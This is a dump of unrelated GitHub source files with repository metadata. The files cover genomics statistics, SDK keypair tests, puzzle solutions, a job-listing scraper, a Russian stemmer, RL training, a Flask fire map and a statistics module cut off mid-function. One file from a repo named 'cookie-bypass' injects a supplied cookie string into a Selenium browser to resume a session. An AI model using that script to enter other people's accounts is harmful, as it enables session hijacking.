\"*\",Juste2NB,Couleur.Vert + \" )\") \n\n \n if REPexp1 == PCreponseExp:\n print(Couleur.Vert + \"Exposant >> \", REPexp1)\n else:\n print(Couleur.Rouge + \"Exposant >> \", 
REPexp1)\n\n","repo_name":"Donald2304/Program_Python","sub_path":"exposant.py","file_name":"exposant.py","file_ext":"py","file_size_in_byte":2742,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"22454935240","text":"import json\nimport logging\n\nfrom collections import namedtuple\n\nfrom core import common\n\nParameters = namedtuple(\n \"Parameters\",\n [\n \"manifest_path\",\n \"multisample_profile_path\",\n \"min_inrepeat_read_pairs\",\n \"output_path\",\n \"test_params\",\n ],\n)\n\n\ndef output_results(count_table, output_path):\n header = [\"motif\", \"pvalue\", \"bonf_pvalue\", \"counts\"]\n header = \"\\t\".join(header)\n with open(output_path, \"w\") as output_file:\n print(header, file=output_file)\n for row in count_table:\n unit = row[\"unit\"]\n pvalue, bonf_pvalue = row[\"pvalue\"], row[\"bonf_pvalue\"]\n\n sample_counts = row[\"sample_counts\"]\n encoded_counts = [\"{}:{}\".format(s, c) for s, c in sample_counts.items()]\n encoded_counts = \",\".join(encoded_counts)\n print(unit, pvalue, bonf_pvalue, encoded_counts, sep=\"\\t\", file=output_file)\n\n\ndef run(params):\n with open(params.multisample_profile_path, \"r\") as profile_file:\n multisample_profile = json.load(profile_file)\n count_table = common.generate_table_with_irr_pair_counts(\n multisample_profile[\"Counts\"]\n )\n\n logging.info(\"Loaded %i regions\", len(count_table))\n\n logging.info(\"Normalizing counts\")\n sample_stats = multisample_profile[\"Parameters\"]\n common.depth_normalize_counts(sample_stats, count_table)\n\n logging.info(\"Filtering counts\")\n count_table = common.filter_counts_by_magnitude(\n count_table, params.min_inrepeat_read_pairs\n )\n\n logging.info(\"%i regions left after filtering\", len(count_table))\n manifest = common.load_manifest(params.manifest_path)\n sample_status = common.extract_case_control_assignments(manifest)\n\n logging.info(\"Comparing counts\")\n common.compare_counts(params.test_params, sample_status, count_table)\n logging.info(\"Correcting p-values\")\n common.correct_pvalues(count_table)\n output_results(count_table, params.output_path)\n logging.info(\"Done\")\n","repo_name":"Illumina/ExpansionHunterDenovo","sub_path":"scripts/casecontrol/motifworkflow.py","file_name":"motifworkflow.py","file_ext":"py","file_size_in_byte":2000,"program_lang":"python","lang":"en","doc_type":"code","stars":69,"dataset":"github-code","pt":"61"} +{"seq_id":"23761317657","text":"# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 
See the\n# License for the specific language governing permissions and limitations\n# under the License.\n\nimport uuid\nimport six\nfrom ecl.tests.functional import base\n\n\nclass TestKeypair(base.BaseFunctionalTest):\n\n @classmethod\n def test_01_import(cls):\n cls.NAME = uuid.uuid4().hex\n keypair = cls.conn.baremetal.create_keypair(name=cls.NAME)\n print(keypair)\n assert isinstance(keypair.fingerprint, six.string_types)\n assert isinstance(keypair.name, six.string_types)\n assert isinstance(keypair.public_key, six.string_types)\n assert isinstance(keypair.private_key, six.string_types)\n\n @classmethod\n def test_02_list(cls):\n keypairs = list(cls.conn.baremetal.keypairs())\n for keypair in keypairs:\n assert isinstance(keypair.fingerprint, six.string_types)\n assert isinstance(keypair.name, six.string_types)\n assert isinstance(keypair.public_key, six.string_types)\n\n def test_show_03(self):\n keypair = self.conn.baremetal.get_keypair(self.NAME)\n self.assertIsInstance(keypair.public_key, six.string_types)\n self.assertIsInstance(keypair.fingerprint, six.string_types)\n self.assertIsInstance(keypair.name, six.string_types)\n\n def test_03_delete(self):\n self.conn.baremetal.delete_keypair(self.NAME)\n\n @classmethod\n def test_05_create(cls):\n cls.NAME2 = uuid.uuid4().hex\n keypair = cls.conn.baremetal.create_keypair(\n name=cls.NAME2,\n public_key=\"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAAAQQCtzdf5vKNNSoeMfTUUj65eJLMjXfIbtc2GQn6+EEISHX6vjBzsTMdToQJEhgg+5rYlb5tc2mvPYNbPDIJV8OyV\")\n print(keypair)\n assert isinstance(keypair.fingerprint, six.string_types)\n assert isinstance(keypair.name, six.string_types)\n assert isinstance(keypair.public_key, six.string_types)\n\n def test_06_delete(self):\n self.conn.baremetal.delete_keypair(self.NAME2)\n","repo_name":"nttcom/eclsdk","sub_path":"ecl/tests/functional/baremetal/test_keypair.py","file_name":"test_keypair.py","file_ext":"py","file_size_in_byte":2396,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"61"} +{"seq_id":"12596200907","text":"# 2) A number starting from 1 can be got by either multiplying 3 or adding 5 to it. 
Given a number, find the sequence of operations to get it or say it’s not possible.\n# Eg: 13 = 1 * 3 + 5 + 5, 15 ; Not possible\n\ndef check(n):\n if n == 1 or n == 6:\n return True\n if n < 1:\n return False\n\n retvalue = []\n\n if n % 3 == 0:\n if check(n/3):\n\n return True\n if check(n-5):\n return True\n\n return False\n\n\nif __name__ == '__main__':\n num = 11\n\n print(check(num))\n","repo_name":"adwaithkj/sortandsearchalgos","sub_path":"GFG/mul3add5dp.py","file_name":"mul3add5dp.py","file_ext":"py","file_size_in_byte":518,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"41638495382","text":"\"\"\"\nCreator: Flokk___\nDate: 18/11/2022\nVersion: V1.0\n\nPurpose:\n\"\"\"\n\n# IMPORT: utils\nimport os\nimport json\n\nimport datetime\n\n# IMPORT: deep learning\nimport torch\n\n# IMPORT: reinforcement learning\nfrom stable_baselines3 import DQN, A2C\nfrom stable_baselines3.common.callbacks import CheckpointCallback\n\nfrom stable_baselines3.common.vec_env import VecFrameStack\nfrom stable_baselines3.common.env_util import make_atari_env\n\n# IMPORT: project\nimport paths\n\n\nclass Trainer:\n _MODELS = {\"DQN\": DQN, \"A2C\": A2C}\n _DEVICE = \"cuda\" if torch.cuda.is_available() else \"cpu\"\n\n def __init__(self, game_id, model_name, weights_path=None):\n # Save paths\n creation_time = datetime.datetime.now().strftime(\"%Y-%m-%d-%H-%M-%S\")\n folder_name = f\"{creation_time}_{game_id}\"\n\n self._save_paths = {\n \"model_path\": os.path.join(paths.MODELS_PATH, folder_name),\n \"checks_path\": os.path.join(paths.MODELS_PATH, folder_name, \"checkpoints\"),\n }\n\n for key, path in self._save_paths.items():\n if not os.path.exists(path):\n os.makedirs(path)\n\n # Environment\n self._env = make_atari_env(game_id, n_envs=16)\n self._env = VecFrameStack(self._env, n_stack=4)\n\n # Model\n tensorboard_path = os.path.join(paths.MODELS_PATH, folder_name, \"tensorboard\")\n\n if weights_path:\n self._model = self._MODELS[model_name].load(weights_path, env=self._env,\n tensorboard_log=tensorboard_path,\n device=self._DEVICE)\n else:\n with open(paths.CONFIG_PATH) as config_file:\n model_config = json.load(config_file)\n self._model = self._MODELS[model_name](**model_config[model_name], env=self._env,\n tensorboard_log=tensorboard_path,\n device=self._DEVICE)\n\n def launch(self, nb_iter):\n checks = CheckpointCallback(save_freq=(nb_iter // self._env.num_envs) // 10,\n save_path=self._save_paths[\"checks_path\"], name_prefix=\"model\")\n\n self._model.learn(total_timesteps=nb_iter, progress_bar=True,\n tb_log_name=\"run\", callback=checks, reset_num_timesteps=False)\n\n self._model.save(path=os.path.join(self._save_paths[\"model_path\"], \"model\"))\n","repo_name":"flokk-dev/RL_gym","sub_path":"src/train/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":2467,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"39510740361","text":"import sys\ninput = sys.stdin.readline\n\narray = []\nanswer = \"\"\n\ndef scan(n, row, col):\n haveZero = False\n haveOne = False\n result = \"\"\n \n for i in range(row, row + n):\n for j in range(col, col + n):\n if array[i][j] == '1':\n haveOne = True\n else:\n haveZero = True\n if haveZero and haveOne:\n return False, result\n if haveOne:\n result = \"1\"\n else:\n result = \"0\" \n\n return True, result\n\ndef solve(n, row, col):\n global answer\n \n isSame, result = scan(n, row, col) \n\n if isSame:\n answer += result\n 
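# mixed quadrant: halve the size and recurse into the four sub-quadrants, wrapping their encodings in parentheses\n    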
else:\n n //= 2\n answer += \"(\"\n solve(n, row, col) \n solve(n, row, col + n) \n solve(n, row + n, col) \n solve(n, row + n, col + n) \n answer += \")\"\n\n\nif __name__ == \"__main__\":\n N = int(input())\n for _ in range(N):\n val = input()\n array.append(val)\n solve(N, 0, 0)\n print(answer)","repo_name":"jwYunn/Baekjoon_Algorithm","sub_path":"baekjoon_1992.py","file_name":"baekjoon_1992.py","file_ext":"py","file_size_in_byte":1024,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"33253292007","text":"import app.settings as SET\nfrom app.functions import *\n\nfrom selenium import webdriver\nfrom selenium.webdriver.common.by import By\n\nfrom bs4 import BeautifulSoup\n\nimport sqlite3,time\n\ndef get_link(getLink_link:str):\n getLink_Jobs_ClassName = SET.getLink_Jobs_ClassName\n getLink_Jobs_CompanyName = SET.getLink_Jobs_CompanyName\n getLink_xpath_nextPage_href = SET.getLink_xpath_nextPage_href\n \n con = sqlite3.connect(SET.MAIN_DATABASE)\n cursor = con.cursor()\n \n X,Y = ScreenSize()\n\n driver = webdriver.Firefox(\"\") \n driver.set_window_position(0, 0)\n driver.set_window_size(int(X*0.33), int(Y*0.66))\n\n driver.get(getLink_link)\n\n time.sleep(10)\n driver.refresh()\n time.sleep(5)\n\n #cookies to accept ...the button must be labelled 'Alles akzeptieren'. \n driver.find_element(by=By.XPATH, value= \"//span[text()='Alles akzeptieren']\").click()\n\n while True: \n html_icerigi = driver.page_source\n soup = BeautifulSoup(html_icerigi, 'lxml')\n\n JobsList = soup.find_all('div',{\"class\":getLink_Jobs_ClassName} )\n \n if len(JobsList) == 0:\n FatherDIV = [i for i in soup.find_all('div') if len(i) == 25]\n\n if FatherDIV: \n for TargetDIV in FatherDIV[0]:\n getLink_Jobs_ClassName = \" \".join([c for c in TargetDIV.get(\"class\")])\n break \n \n else:\n getLink_Jobs_ClassName = \"\"\n driver.quit()\n raise TypeError(\"Error: No 25 jobs found. Trying the next link.\")\n \n JobsList = soup.find_all('div',{\"class\":getLink_Jobs_ClassName} ) \n\n\n\n\n #Loop over all links on the open page\n for Job in JobsList:\n JobArticle = Job.find(\"div\").find('article')\n elementsA = JobArticle.find_all('a')\n\n companyName = Job.find(\"div\",{\"class\":getLink_Jobs_CompanyName})\n \n if companyName:\n companyName = companyName.text\n else:\n companyName = \"\"\n\n if len(elementsA) == 3:\n href1= elementsA[0]['href'] #Other jobs from the same company\n href2= elementsA[1]['href'] #link to the job posting\n href3= elementsA[2]['href'] #link to the job posting\n else: \n href1 = \"\\n\".join([link['href'] for link in elementsA])\n cursor.execute(\"INSERT INTO failedLinks VALUES(?,?)\",(href1,\"\"));con.commit() #Stores the links that do not fit\n continue\n\n cursor.execute(\"INSERT INTO links VALUES(?,?,?,?)\",(href1,href2,href3,companyName));con.commit() #Stores the link if it fits\n \n href = \"\"\n xpath = getLink_xpath_nextPage_href\n element1 = driver.find_element(by=By.XPATH, value=xpath)\n if element1:\n href = element1.get_attribute(\"href\")\n if href == None:\n driver.quit()\n raise ValueError(\"No further pages available. 
Starting with the next link..\")\n else:\n driver.quit()\n raise TypeError(\"An error prevents moving to the next page\")\n\n driver.get(href) \n \n\n\n\n\n \n ","repo_name":"KoalasCodeBook/Stepstone-Bot","sub_path":"app/getlink.py","file_name":"getlink.py","file_ext":"py","file_size_in_byte":3308,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"22738802863","text":"#! /usr/bin/env python\n# -*- coding: utf-8 -*-\n\n##########\n## russianstemmer.py Version 1.0 (2015-02-12)\n##\n## Original author: Matthew Menzenski (menzenski@ku.edu)\n##\n## License: CC-BY-4.0 ( https://creativecommons.org/licenses/by/4.0/ )\n##########\n\nimport nltk, codecs\nfrom unicodedata import category\nfrom nltk.stem import SnowballStemmer\n\n# text you'd like to stem\ninput_file = 'WarAndPeaceFull_ignore.txt'\n\n# place to save the stemmed text\nresults_file = 'stemmedWarAndPeace_ignore.txt'\n\n# list of all stemmed tokens\nall_stems = []\n\npunct = [u\"\"\".,;:'\"`-„”()[]1234567890\"\"\"]\n\ndef get_stems(rus_text):\n unstemmed_text = codecs.open(rus_text, encoding=\"utf8\").read()\n\n # strip punctuation marks\n unstemmed_text = ''.join(\n ch for ch in unstemmed_text if category(ch)[0] != 'P')\n \n tokens = nltk.word_tokenize(unstemmed_text)\n stemmer = SnowballStemmer(\"russian\")\n\n for token in tokens:\n bare_stem = stemmer.stem(unicode(token))\n all_stems.append(bare_stem)\n\ndef write_to_file(target_file, unicode_list):\n with codecs.open(target_file, \"a\", encoding=\"utf-8\") as stream:\n for unicode_item in unicode_list:\n stream.write(\"%s \" % unicode_item)\n\ndef main():\n get_stems(input_file)\n #for stem in all_stems:\n # print stem.encode('utf8'),\n write_to_file(results_file, all_stems)\n\nif __name__ == '__main__':\n main()\n","repo_name":"menzenski/python-tools","sub_path":"russian-stemmer/russianstemmer.py","file_name":"russianstemmer.py","file_ext":"py","file_size_in_byte":1395,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"24437110217","text":"from selenium import webdriver\n\n\ndef load_driver():\n \"\"\"Create the webdriver to display custom sites.\"\"\"\n options = webdriver.FirefoxOptions()\n options.binary_location = \"/usr/bin/firefox\"\n return webdriver.Firefox(firefox_options=options)\n\n\ndef open(url, cookie_string, secure=True):\n \"\"\"Open the given URL with the supplied cookie string.\"\"\"\n driver = load_driver()\n\n # force wait for page load\n # generic, may not work on heavy pages / low internet speed\n driver.implicitly_wait(10)\n\n # open full-url with correct scheme\n protocol = 'http'\n if secure:\n protocol += 's'\n driver.get(f'{protocol}://{url}')\n\n # re-set incoming cookies\n driver.delete_all_cookies()\n for c in cookie_string.strip().split(';'):\n (name, value) = c.split('=')\n driver.add_cookie({'name': name, 'value': value})\n\n driver.refresh()\n","repo_name":"yanmarques/cookie-bypass","sub_path":"browser.py","file_name":"browser.py","file_ext":"py","file_size_in_byte":849,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"11519149246","text":"from flask_restful import Resource\nfrom Lottery.rest_flask_api.scrapper.common_game.draw_scrapper import get_draw as get_draw_online\nfrom Lottery.rest_flask_api.resource.quickpick import get_quick_pick\nfrom Lottery.rest_flask_api.scrapper.common_game.history_scrapper import get_history\nfrom Lottery.rest_flask_api.cluster.draw_cluster 
import update_game_draw_result, update_all_games_draw_result\nfrom Lottery.rest_flask_api.resource.game_info import GameInfo\n\n\nclass CommonGameResources(Resource):\n def get(self, game_name, function=\"info\") -> dict:\n\n game_info = GameInfo.LOTTO\n\n if game_name == \"all\" and function == \"draw_update\":\n return {\"response\": update_all_games_draw_result()}\n else:\n for this_game in GameInfo:\n try:\n if this_game.value[0]['game_name'] == game_name:\n game_info = this_game\n break\n except KeyError:\n if this_game.value['game_name'] == game_name:\n game_info = this_game\n break\n\n if function == \"info\":\n try:\n return game_info.value[0]\n except KeyError:\n return game_info.value\n elif function == \"draw\":\n try:\n return get_draw_online(game_info.value[0][\"latest_draw_result_url\"])\n except KeyError:\n return get_draw_online(game_info.value[\"latest_draw_result_url\"])\n elif function == \"draw_update\":\n return update_game_draw_result(game_name)\n elif function == \"history\":\n try:\n return get_history(game_info.value[0][\"draw_history_url\"])\n except KeyError:\n return get_history(game_info.value[\"draw_history_url\"])\n elif function == \"quick_pick\":\n return get_quick_pick(game_name)\n else:\n try:\n return {function: dict(game_info.value[0])[function]}\n except KeyError:\n return {function: dict(game_info.value)[function]}\n","repo_name":"wastedMynd/pythonProject","sub_path":"Lottery/rest_flask_api/resource/common_game.py","file_name":"common_game.py","file_ext":"py","file_size_in_byte":2215,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"25633242993","text":"class SinglyLinkedListNode:\n\n def __init__(self,data):\n self.data=data\n self.next=None\n\n#problem\ndef getNode(head, positionFromTail):\n newArray=list()\n\n current=head\n\n while current!=None:\n newArray.append(current.data)\n current=current.next\n\n return newArray[len(newArray)-1-positionFromTail]\n\n\ndef printLinkedList(node):\n current=node\n while current != None:\n print(current.data)\n current=current.next\n\n\nhead = SinglyLinkedListNode(16)\nhead.next=SinglyLinkedListNode(13)\nhead.next.next=SinglyLinkedListNode(1)\nhead.next.next.next=SinglyLinkedListNode(7)\nhead.next.next.next.next=SinglyLinkedListNode(9)\n\n\nprint(getNode(head,2))\n","repo_name":"Burakdal/AlgorithmPractise","sub_path":"LinkedList/problem_7.py","file_name":"problem_7.py","file_ext":"py","file_size_in_byte":693,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"6224465282","text":"##Requirement: the user can move the widget by dragging anywhere inside it\n\n\nfrom PyQt5.Qt import *\nimport sys\n\n\nclass window(QWidget):\n def __init__(self):\n super().__init__()\n self.move_flage = False\n\n\n def mousePressEvent(self, QMouseEvent) :\n '''\n Record the point where the mouse was first pressed\n Record the window's current origin point\n '''\n\n #determine the origin point of the widget relative to the current window\n if QMouseEvent.button() == Qt.LeftButton:\n self.move_flage = True\n self.mouse_x = QMouseEvent.globalX()\n self.mouse_y = QMouseEvent.globalY()\n\n #determine the point where the mouse was first pressed\n self.origin_x = self.x()\n self.origin_y = self.y()\n\n def mouseMoveEvent(self, QMouseEvent):\n if self.move_flage:\n #compute the movement vector\n move_x = QMouseEvent.globalX() - self.mouse_x\n move_y = QMouseEvent.globalY() - self.mouse_y\n\n #the final target position\n dest_x = self.origin_x + move_x\n dest_y = self.origin_y + move_y\n self.move(dest_x, dest_y)\n\n\n def mouseReleaseEvent(self, QMouseEvent) :\n #mouse button released\n self.move_flage = False\n\n\napp = QApplication(sys.argv)\nwindow = window()\nwindow.resize(500, 
500)\nwindow.setMouseTracking(True)\nwindow.show()\nsys.exit(app.exec())\n\n\n","repo_name":"ywkangkai/PythonGUI","sub_path":"GUI/QWidgt/事件机制/案例/案例5.py","file_name":"案例5.py","file_ext":"py","file_size_in_byte":1375,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"27850195669","text":"import numpy as np\nimport tensorflow as tf\n\nfrom Complex_Model.Complex_Net import Complex_Model\nfrom Model.Net import Model\nfrom Tools.data_load import data_load\nfrom utils.config import cfg\nfrom utils.show_progress_bar import view_bar\n\ntrain_dataType = ''\ntest_dataType = ''\nckpt_path=''\n\ntrain_images,labels, test_images, test_labels = data_load(train_dataType, test_dataType)\nxs = tf.placeholder(tf.float32, [cfg.batch_size, 64,64,2])\nys = tf.placeholder(tf.float32, [cfg.batch_size, 1])\n# xs_ = tf.complex(xs, 0.0)\n\ncomplex_nn = Complex_Model()\ncomplex_out = complex_nn.build_net(inputs=xs)\n\nnn = Model()\nsiamese_out = nn.build_net(complex_out)\nnn_out = tf.layers.dense(siamese_out, units=1, activation=tf.nn.sigmoid, name='out')\n\nglobal_step = tf.Variable(0,trainable=False)\nlearing_rate = tf.train.exponential_decay(cfg.lr,global_step,cfg.decay_step,1,staircase=False)\nacc = nn.acc(logits=nn_out, labels=ys)\nloss =nn.loss(logits=nn_out, labels=ys)\noptimizer = tf.train.AdamOptimizer(learing_rate)\ntrain_step = optimizer.minimize(loss)\nsess = tf.Session()\nsaver = tf.train.Saver(max_to_keep=20)\ninit = tf.global_variables_initializer()\n\nsess.run(init)\nfor epoch in range(cfg.epoch_num):\n tr_loss = []\n tr_acc = []\n for start, end in zip(range(0, len(train_images), cfg.batch_size),\n range(cfg.batch_size, len(train_images), cfg.batch_size)):\n rand = np.random.choice(len(train_images), cfg.batch_size)\n x, y = (train_images[rand], labels[rand])\n _, _loss, _acc = sess.run([train_step, loss, acc], feed_dict={xs: x, ys: y})\n # if (start/cfg.batch_size) %100 == 0:\n # print(_loss, _acc)\n tr_loss.append(_loss)\n tr_acc.append(_acc)\n view_bar(start / cfg.batch_size, len(train_images) / cfg.batch_size, epoch, cfg.epoch_num)\n\n\n print(\"\\n\")\n print('epoch %d: acc %.3f sigmoid_loss %.6f' % (epoch, np.mean(tr_acc), np.mean(tr_loss)))\n te_loss = []\n te_acc = []\n for start, end in zip(range(0, len(test_images), cfg.batch_size),\n range(cfg.batch_size, len(test_images), cfg.batch_size)):\n x, y = (test_images[start:end], test_labels[start:end])\n _loss, _acc = sess.run([loss, acc], feed_dict={xs: x, ys: y})\n te_loss.append(_loss)\n te_acc.append(_acc)\n print('test : acc %.3f sigmoid_loss %.6f' % (np.mean(te_acc), np.mean(te_loss)))\n\n saver.save(sess, ckpt_path, global_step=epoch)\n\n\n\n","repo_name":"swJiang/CCN-CTN","sub_path":"CCN_train.py","file_name":"CCN_train.py","file_ext":"py","file_size_in_byte":2452,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"74407911555","text":"from flask import Flask, render_template, request, url_for, redirect\nfrom flask_googlemaps import GoogleMaps\nfrom flask_googlemaps import Map, icons\nimport googlemaps\nimport requests, json\n\napp = Flask(__name__, template_folder=\".\")\nGoogleMaps(app)\ngmaps = googlemaps.Client(key='APIKEY')\njsonget = requests.get('http://127.0.0.1/')\ndata = json.loads(jsonget.content)\n\nmarks = []\nfires = []\nfires_n = 0\npeople_n = 0\ndatacity = []\nposla = 0\nposlo = 0\nlan = 0\nlon = 0\nfor i in data[\"path\"]:\n marks.append({\n\t'icon': 
'http://maps.google.com/mapfiles/ms/icons/green-dot.png',\n\t'lat': i[0],\n\t'lng': i[1],\n\t'infobox': \"Person phone?\"\n    })\n    people_n += 1\n\nlan=data[\"path\"][0][0]\nlon=data[\"path\"][0][1]\n\nfor i in data[\"fires\"]:\n    location = gmaps.reverse_geocode((i[\"coords\"][0],i[\"coords\"][1]))\n    datacity.append(location[0][\"formatted_address\"])\n    fires.append({\n        'stroke_color': '#8B0000',\n        'stroke_opacity': 1.0,\n        'stroke_weight': 1,\n        'fill_color': '#8B0000',\n        'fill_opacity': 0.2,\n        'center': {\n            'lat': i[\"coords\"][0],\n            'lng': i[\"coords\"][1]\n        },\n        'radius': i[\"radius\"],\n        'infobox': \"fire area\"\n    })\n    fires_n += 1\n    \n\n@app.route(\"/\")\ndef mapview():\n\tmap = Map(\n\tidentifier=\"map\",\n\tlat=lan,\n\tlng=lon,\n\tcluster=True,\n    cluster_gridsize=70,\n    cluster_imagepath=\"static/images/m\",\n    style=\"width:100%;height:100%\",\n\tmarkers=marks,\n\tcircles=fires,\n\t)\n\treturn render_template('example.html', map=map, count=fires_n, countp=people_n, countpn=people_n, datacity=datacity)\n\n@app.route(\"/set\", methods=['POST'])\ndef set():\n    name=request.form['list']\n    global lon, lan\n    lan=data[\"fires\"][int(name)][\"coords\"][0]\n    lon=data[\"fires\"][int(name)][\"coords\"][1]\n    return redirect(url_for('mapview'))\n\nif __name__ == \"__main__\":\n\tapp.run(debug=True)\n","repo_name":"Aifryz/FireHelper","sub_path":"firefighters/firehelper/fireHelper.py","file_name":"fireHelper.py","file_ext":"py","file_size_in_byte":1875,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} {"seq_id":"8901908299","text":"from typing import List\n\n# URL to the problem solved below:\n# https://leetcode.com/problems/best-time-to-buy-and-sell-stock-with-transaction-fee/description/\n\nclass Solution:\n\n    # This was my first approach, but it was not working properly\n    def maxProfitNotWorking(self, prices: List[int], fee: int) -> int:\n        result = []\n        bought = False\n\n        for day_price in range(0,len(prices)):\n            if not bought and (day_price != len(prices)-1):\n                result.append(prices[day_price])\n                bought = True\n            elif bought and (abs(result[-1] - prices[day_price]) - fee) > 0:\n                result.append(prices[day_price])\n                bought = False\n\n        return sum([(result[i + 1] - result[i]) - fee for i in range(0, len(result)-1, 2)])\n\n    # This solution works properly and beats 89.61% of users lets gooooo\n    def maxProfit(self, prices: List[int], fee: int) -> int:\n        notHold, hold = 0, -prices[0]\n        for i in range(1, len(prices)):\n            hold = max(hold, notHold - prices[i])\n            notHold = max(notHold, hold + prices[i] - fee)\n        return notHold","repo_name":"Wastelander777/personal_development","sub_path":"714. Best Time to Buy and Sell Stock with Transaction Fee.py","file_name":"714. 
Best Time to Buy and Sell Stock with Transaction Fee.py","file_ext":"py","file_size_in_byte":1130,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} {"seq_id":"40530323047","text":"\"\"\"Some useful statistics methods.\"\"\"\nfrom __future__ import division\n\nimport math\nfrom math import sqrt, exp, log\nimport copy\n\nNaN = float(\"nan\")\n\n## Sample statistics\n\ndef mean(xs):\n    \"\"\"Sample mean.\"\"\"\n    if len(xs) > 0:\n        return sum(xs) / len(xs)\n    else:\n        return NaN\n\ndef var(xs):\n    \"\"\"Sample variance.\"\"\"\n    if len(xs) > 1:\n        m = mean(xs)\n        xs2 = [(x-m)**2 for x in xs]\n        return sum(xs2) / (len(xs) - 1)\n    else:\n        return NaN\n\ndef stddev(xs):\n    \"\"\"Sample standard deviation.\"\"\"\n    return sqrt(var(xs))\n\ndef moment(k, xs):\n    \"\"\"Sample k-th central moment. Note: not unbiased.\"\"\"\n    if len(xs) > 0:\n        m = mean(xs)\n        xs_k = [(x-m)**k for x in xs]\n        return sum(xs_k) / len(xs)\n    else:\n        return NaN\n\ndef skewness(xs):\n    \"\"\"Sample skewness.\"\"\"\n    return moment(3, xs) / var(xs)**(3/2)\n\ndef kurtosis(xs):\n    \"\"\"Sample kurtosis.\"\"\"\n    return moment(4, xs) / var(xs)**2 - 3\n\ndef _get_index(xs, n):\n    \"\"\"Get a fractionally indexed item by interpolation.\"\"\"\n    if len(xs) == 0:\n        return NaN\n    assert 0 <= n <= len(xs) - 1\n    if n == len(xs) - 1:\n        return xs[-1]\n    i = int(n // 1) # Integral part\n    f = n % 1 # Fractional part\n    \n    return (1-f) * xs[i] + f * xs[i+1]\n\ndef quantiles(xs, *quantiles):\n    \"\"\"Find a set of quantiles in data.\"\"\"\n    # NOTE: Will be inefficient for large len(xs)\n    xs = copy.copy(xs)\n    xs.sort()\n    \n    return [_get_index(xs, quant * (len(xs) - 1)) for quant in quantiles]\n\ndef median(xs):\n    \"\"\"Sample median.\"\"\"\n    # NOTE: Will be inefficient for large len(xs)\n    return quantiles(xs, 0.5)[0]\n\ndef quartiles(xs):\n    \"\"\"Divisions between quartiles.\"\"\"\n    return quantiles(xs, 0.25, 0.5, 0.75)\n\n\n## Statistical Distributions\n\n# Parameters in Lin approximation\na1 = -0.9911; b1 = 0.8055\na2 = -0.6763; b2 = -1.2451\n\ndef chi_dist(deg, x):\n    \"\"\"Returns the cumulative distribution of chi squared up to x.\n    Currently, it is an approximation from Lin-1988 \"\"\"\n    \n    z = sqrt(x) - sqrt(deg)\n    \n    if z <= 0:\n        return 1 - exp(b1 * z + a1 * z**2) / 2\n    else:\n        return exp(b2 * z + a2 * z**2) / 2\n\ndef chi_inv(deg, p):\n    \"\"\"The inverse cumulative distribution of chi squared \n    for 'deg' degrees of freedom and 'p' cumulative probability.\n    Currently, it is an approximation from Lin-1988 \"\"\"\n    \n    if p >= 0.5:\n        c = -log(2 * (1-p))\n        z = (-b1 + sqrt(b1**2 - 4*a1*c)) / (2*a1)\n    else:\n        c = -log(2 * p)\n        z = (-b2 - sqrt(b2**2 - 4*a2*c)) / (2*a2)\n    \n    return (z + sqrt(deg))**2\n    \n\n## Exponential Distribution analysis\n#\n# f(x;m) = 1/m e^{-x/m}\n#\n# if X ~ f(m) then E[X] = m\n# Likewise, the maximum likelihood estimator for m is mean(X's)\n\ndef exp_mean_interval(xs, alpha):\n    \"\"\"\n    Returns the 100(1-alpha)% confidence interval for the parameter m (the mean) based on data.\n    Based on \n    \"\"\"\n    m_hat = mean(xs) # Maximum likelihood estimator for m\n    n = len(xs)\n    \n    chi_low = chi_inv(2*n, alpha/2) # Lower chi squared parameter\n    lower_bound = m_hat * 2*n / chi_low\n    \n    chi_up = chi_inv(2*n, 1 - alpha/2) # Upper parameter\n    upper_bound = m_hat * 2*n / chi_up\n    \n    return lower_bound, m_hat, upper_bound\n\n\n## Gamma Distribution analysis\n\ndef gamma_mle(xs):\n    \"\"\"\n    Maximum likelihood estimation for k, theta for a gamma distribution.\n    Based on \n    \"\"\"\n    N = len(xs)\n    if N < 1:\n        return 
